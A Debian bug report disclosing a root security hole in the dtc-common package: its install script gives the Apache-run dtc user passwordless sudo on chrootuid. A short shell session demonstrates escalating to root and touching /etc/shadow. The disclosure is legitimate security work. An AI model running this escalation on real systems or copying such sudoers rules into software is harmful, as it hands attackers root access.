Package: dtc-common Severity: critical Tags: security Justification: root security hole
the install script gives sudo access to the dtc user (the user that is running apache) unrestricted access to chrootuid, which essentially gives root access to the dtc account: root@testdtc:/var/lib/dtc/etc# su - dtc $ whoami dtc $ sudo chrootuid / root /bin/bash root@testdtc:/# whoami root root@testdtc:/# wc -l /etc/shadow 27 /etc/shadow rot@testdtc:/# grep dtc /etc/sudoers Defaults:dtc !set_logname dtc ALL= NOPASSWD: /usr/bin/chrootuid * -- System Information: Debian Release: wheezy/sid APT prefers unstable APT policy: (600, 'unstable'), (500, 'testing'), (1, 'experimental') Architecture: amd64 (x86_64) Kernel: Linux 3.0.0-1-amd64 (SMP w/2 CPU cores) Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/bash -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
